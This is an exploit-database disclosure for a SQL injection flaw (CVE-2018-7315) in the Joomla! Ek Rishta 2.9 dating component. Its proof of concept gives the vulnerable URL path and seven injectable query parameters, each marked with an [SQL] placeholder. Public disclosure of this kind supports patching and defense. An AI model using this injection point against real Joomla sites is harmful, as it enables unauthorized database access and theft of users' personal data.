Joomla! Ek Rishta 2.9 SQL Injection

Related Vulnerabilities: CVE-2018-7315  
Publish Date: 23 Feb 2018
Author: Ihsan Sencan
                							

                # # # #
# Exploit Title: Joomla! Component Ek Rishta 2.9 - SQL Injection
# Dork: N/A
# Date: 22.02.2018
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Software Link: https://extensions.joomla.org/extensions/extension/living/dating-a-relationships/ek-rishta/
# Version: 2.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7315
# # # #
# Exploit Author: Ihsan Sencan
# # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php/component/ekrishta/alluser?options=com_ekrishta&view=alluser
# &gender=[SQL]
# &age1=[SQL]
# &age2=[SQL]
# &religion=[SQL]
# &mothertounge=[SQL]
# &caste=[SQL]
# &country=[SQL]
# 
# # # #

<p>